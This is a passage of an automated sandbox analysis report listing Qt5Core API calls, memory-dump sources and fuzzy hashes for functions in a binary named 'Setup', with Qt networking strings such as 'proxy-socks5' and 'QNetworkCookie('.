                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??YQByteArray@@QEAAAEAV0@D@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1980517), ref: 00007FFBA1982A5E
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??YQByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1980517), ref: 00007FFBA1982A6F
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??YQByteArray@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FFBA1982A92
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??YQByteArray@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FFBA1982AAC
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ?isValid@QDateTime@@QEBA_NXZ.QT5CORE ref: 00007FFBA1982AB9
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??YQByteArray@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FFBA1982AD2
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??0QLocale@@QEAA@W4Language@0@W4Country@0@@Z.QT5CORE ref: 00007FFBA1982AE3
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA1982B0C
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ?toTimeSpec@QDateTime@@QEBA?AV1@W4TimeSpec@Qt@@@Z.QT5CORE ref: 00007FFBA1982B23
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ?toString@QLocale@@QEBA?AVQString@@AEBVQDateTime@@AEBV2@@Z.QT5CORE ref: 00007FFBA1982B39
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ?toLatin1@QString@@QEHAA?AVQByteArray@@XZ.QT5CORE ref: 00007FFBA1982B46
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??YQByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1982B53
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1982B5D
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1982B67
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1982B71
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1982B7B
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??1QLocale@@QEAA@XZ.QT5CORE ref: 00007FFBA1982B85
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ?isEmpty@QString@@QEBA_NXZ.QT5CORE ref: 00007FFBA1982B92
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??YQByteArray@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FFBA1982BAB
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FFBA1982BBA
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQByteArray@@@Z.QT5CORE ref: 00007FFBA198051D
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@D@Z.QT5CORE ref: 00007FFBA1980528
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1980533
                                                                                                                                                              • ??0QDebug@@QEAA@$$QEAV0@@Z.QT5CORE ref: 00007FFBA198053F
                                                                                                                                                              • ??1QDebugStateSaver@@QEAA@XZ.QT5CORE ref: 00007FFBA198054A
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE ref: 00007FFBA1980553
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Array@@$String@@$Debug@@$DateTime@@V0@@$Locale@@$DebugEmpty@Latin1Saver@@Spec@StateTime$?resetA@$$Array@@@Char@@Char@@@Country@0@@Debug@@@Format@Language@0@Latin1@Qt@@@String@String@@@V2@@Valid@
                                                                                                                                                              • String ID: QNetworkCookie(
                                                                                                                                                              • API String ID: 4281602630-3944712187
                                                                                                                                                              • Opcode ID: 08be97c4103b21d52358a42ef796fbf677ed23c7f39ea229667e18de9d1fae62
                                                                                                                                                              • Instruction ID: 7b947ee31944d854cd7a4479365f2faaef7452c5b7cc3bb180d89c2698ef4203
                                                                                                                                                              • Opcode Fuzzy Hash: 08be97c4103b21d52358a42ef796fbf677ed23c7f39ea229667e18de9d1fae62
                                                                                                                                                              • Instruction Fuzzy Hash: A811616660EA5286EB42AB23F8541796361FB89FE1F444032DE5E07768EF3CD149CF00
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$Array@@Byte$V0@@$?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1605803759-0
                                                                                                                                                              • Opcode ID: 9c394dad2745f26afad0d835458d3cf8a878f16f66659658877b95e1c8bab704
                                                                                                                                                              • Instruction ID: a86b8ff30d3aaf39cfd006f160a99c510b7ad6a57f4b2fdfe6c83d2efdd3aa59
                                                                                                                                                              • Opcode Fuzzy Hash: 9c394dad2745f26afad0d835458d3cf8a878f16f66659658877b95e1c8bab704
                                                                                                                                                              • Instruction Fuzzy Hash: BF3195A2B0AB4286DF619F25E9441B96762FF81BE6F494131CE5E0B764DF3CD44ACB00
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$memmove$?append@?detach_grow@?dispose@?end@Data@1@Data@1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1543662975-0
                                                                                                                                                              • Opcode ID: 378ee445609e1d19a50479974f7c0fce46371df3be2afe49f3b48be6e643e13a
                                                                                                                                                              • Instruction ID: 3f96fbac7e1ec74335293fffdd7d1de4ffe97bfafd2584a8cb9b628ea0913249
                                                                                                                                                              • Opcode Fuzzy Hash: 378ee445609e1d19a50479974f7c0fce46371df3be2afe49f3b48be6e643e13a
                                                                                                                                                              • Instruction Fuzzy Hash: 5A31BF72B0AA4282EF51CF25E5541B87369EB85BA1F184132DE1E477A4EF3CD486CF00
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$DateTime@@V0@$$V0@@$?clear@?index?left@?mid@CaseLatin1Qt@@@Sensitivity@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2484421654-0
                                                                                                                                                              • Opcode ID: 2b71be30257cd61b2a9613fcff5fd81ee68421065e2b618b02493192e5927ca2
                                                                                                                                                              • Instruction ID: 7ec2d041b00261e782ed18fc65f91df603da432448ab6f8101df3b9d56a4751b
                                                                                                                                                              • Opcode Fuzzy Hash: 2b71be30257cd61b2a9613fcff5fd81ee68421065e2b618b02493192e5927ca2
                                                                                                                                                              • Instruction Fuzzy Hash: DB213C7660DA4286DB51CF24E444069B370FB88BA8F544232DEAE06AA8EF3CD549CF40
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA1972ADA
                                                                                                                                                              • ?setScheme@QUrl@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA1972AE8
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1972AF2
                                                                                                                                                              • ?scheme@QUrl@@QEBA?AVQString@@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B05
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B0E
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B1B
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B2D
                                                                                                                                                              • ?setUserName@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B51
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B5B
                                                                                                                                                              • ?setHost@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B7A
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B84
                                                                                                                                                              • ?setPort@QUrl@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B99
                                                                                                                                                              • ?setFragment@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BA9
                                                                                                                                                              • ?toEncoded@QUrl@@QEBA?AVQByteArray@@V?$QUrlTwoFlags@W4UrlFormattingOption@QUrl@@W4ComponentFormattingOption@2@@@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BC8
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BE2
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BEC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$?set$Mode@1@@Parsing$Array@@ByteFormattingString@@@$?scheme@ComponentEmpty@Encoded@Flags@Fragment@Host@Latin1Name@Option@Option@2@@@@Port@Scheme@User
                                                                                                                                                              • String ID: proxy-socks5
                                                                                                                                                              • API String ID: 475963459-643255735
                                                                                                                                                              • Opcode ID: 02037a369cbef131aaed94efa849bd51d112a4d45360b026dfddde4a332cc209
                                                                                                                                                              • Instruction ID: 7cc12cd24ec6265e156b5d92e1df46d5b8d7302173aa52b260eda3734f0ab757
                                                                                                                                                              • Opcode Fuzzy Hash: 02037a369cbef131aaed94efa849bd51d112a4d45360b026dfddde4a332cc209
                                                                                                                                                              • Instruction Fuzzy Hash: C611FB62A19A1699EF82CF74D8400FC23B1FF54759B844032DE5E16968EF3CE18ACB50
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA1972ADA
                                                                                                                                                              • ?setScheme@QUrl@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA1972AE8
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1972AF2
                                                                                                                                                              • ?scheme@QUrl@@QEBA?AVQString@@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B05
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B0E
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B1B
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B2D
                                                                                                                                                              • ?setUserName@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B51
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B5B
                                                                                                                                                              • ?setHost@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B7A
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B84
                                                                                                                                                              • ?setPort@QUrl@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B99
                                                                                                                                                              • ?setFragment@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BA9
                                                                                                                                                              • ?toEncoded@QUrl@@QEBA?AVQByteArray@@V?$QUrlTwoFlags@W4UrlFormattingOption@QUrl@@W4ComponentFormattingOption@2@@@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BC8
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BE2
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BEC
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$?set$Mode@1@@Parsing$Array@@ByteFormattingString@@@$?scheme@ComponentEmpty@Encoded@Flags@Fragment@Host@Latin1Name@Option@Option@2@@@@Port@Scheme@User
                                                                                                                                                              • String ID: proxy-http
                                                                                                                                                              • API String ID: 475963459-3197784052
                                                                                                                                                              • Opcode ID: 36a5da7b9ce105b5e7865be1c403b06abba357b2cb97761589ca68bafe899a6e
                                                                                                                                                              • Instruction ID: 4894800cd532f632f69ea68d1e44365f2e06b8463be29db31bc9d8e823c44dc5
                                                                                                                                                              • Opcode Fuzzy Hash: 36a5da7b9ce105b5e7865be1c403b06abba357b2cb97761589ca68bafe899a6e
                                                                                                                                                              • Instruction Fuzzy Hash: 3811FB62A19A1699EF82CF74D8440FC23B1FF54759B844032DE5E16968EF3CE18ACB50
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA1972ADA
                                                                                                                                                              • ?setScheme@QUrl@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA1972AE8
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1972AF2
                                                                                                                                                              • ?scheme@QUrl@@QEBA?AVQString@@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B05
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B0E
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B1B
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B2D
                                                                                                                                                              • ?setUserName@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B51
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B5B
                                                                                                                                                              • ?setHost@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B7A
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B84
                                                                                                                                                              • ?setPort@QUrl@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972B99
                                                                                                                                                              • ?setFragment@QUrl@@QEAAXAEBVQString@@W4ParsingMode@1@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BA9
                                                                                                                                                              • ?toEncoded@QUrl@@QEBA?AVQByteArray@@V?$QUrlTwoFlags@W4UrlFormattingOption@QUrl@@W4ComponentFormattingOption@2@@@@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BC8
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BE2
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA1971DB1), ref: 00007FFBA1972BEC
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$?set$Mode@1@@Parsing$Array@@ByteFormattingString@@@$?scheme@ComponentEmpty@Encoded@Flags@Fragment@Host@Latin1Name@Option@Option@2@@@@Port@Scheme@User
                                                                                                                                                              • String ID: proxy-ftp
                                                                                                                                                              • API String ID: 475963459-2479258935
                                                                                                                                                              • Opcode ID: 3a68584a425a5551b06a62eb78bd4982679a0e98bc6d5354b8999998a628927c
                                                                                                                                                              • Instruction ID: 25b23c36e1e7c09fe1646001181b5c0903de7b959a694cecd199c28fdabb64a0
                                                                                                                                                              • Opcode Fuzzy Hash: 3a68584a425a5551b06a62eb78bd4982679a0e98bc6d5354b8999998a628927c
                                                                                                                                                              • Instruction Fuzzy Hash: D9110A62A09A1699EF82CF74D8400FC33B1FB54759B804032DE5E16A68EF3CE18ACB50
                                                                                                                                                              APIs
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E7191
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E71AD
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E71C9
                                                                                                                                                              • ?firstNode@QHashData@@QEAAPEAUNode@1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E721A
                                                                                                                                                              • ?nextNode@QHashData@@SAPEAUNode@1@PEAU21@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E7264
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E727C
                                                                                                                                                              • ?qHash@@YAIAEBVQString@@I@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E72A7
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19713F9), ref: 00007FFBA19E72F7
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??8@String@@0@$Data@@HashNode@Node@1@$?first?nextHash@@String@@U21@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 472770931-0
                                                                                                                                                              • Opcode ID: f3e025adb8ae439b954cf2fbaa3e860575d7608587ea9348c42fceb0185e5e5e
                                                                                                                                                              • Instruction ID: c158c0b184326c5f74496ed3244ddc048121066ad3d27e580c17e897cf01d681
                                                                                                                                                              • Opcode Fuzzy Hash: f3e025adb8ae439b954cf2fbaa3e860575d7608587ea9348c42fceb0185e5e5e
                                                                                                                                                              • Instruction Fuzzy Hash: FA7189B6A0AB8186DBA5CB25F44026A77A1FB85BC8F444031DECE07799DF3CD456CB41
                                                                                                                                                              APIs
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A3E1ED
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A3E2B4
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A3E324
                                                                                                                                                              • ?isEmpty@QListData@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A3E32F
                                                                                                                                                              • ?at@QListData@@QEBAPEAPEAXH@Z.QT5CORE ref: 00007FFBA1A3E344
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1A3E35B
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1A3E369
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1A3E391
                                                                                                                                                                • Part of subcall function 00007FFBA1A3D3B0: ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D3F0
                                                                                                                                                                • Part of subcall function 00007FFBA1A3D3B0: ?indexOf@QByteArray@@QEBAHPEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D407
                                                                                                                                                                • Part of subcall function 00007FFBA1A3D3B0: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D41A
                                                                                                                                                                • Part of subcall function 00007FFBA1A3D3B0: ?at@QByteArray@@QEBADH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D429
                                                                                                                                                                • Part of subcall function 00007FFBA1A3D3B0: ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1A3D438
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1A3E39F
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A3E424
                                                                                                                                                                • Part of subcall function 00007FFBA1A36460: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36478
                                                                                                                                                                • Part of subcall function 00007FFBA1A36460: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3649D
                                                                                                                                                                • Part of subcall function 00007FFBA1A36460: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A364B4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$Array@@ByteV0@@$?dispose@?size@Data@1@@String@@$?at@DateEmpty@Logger@@MessageTime@@$?index?warning@Category@@Enabled@H00@LoggingWarning
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 114117993-0
                                                                                                                                                              • Opcode ID: 159b953871c001e70db0b375270fe6e1127ff7d73d89528e52021a248f516f90
                                                                                                                                                              • Instruction ID: f90780375f6e2d0b1f927e24be39906b523b542aa9b5cb115f0965c18a4cd213
                                                                                                                                                              • Opcode Fuzzy Hash: 159b953871c001e70db0b375270fe6e1127ff7d73d89528e52021a248f516f90
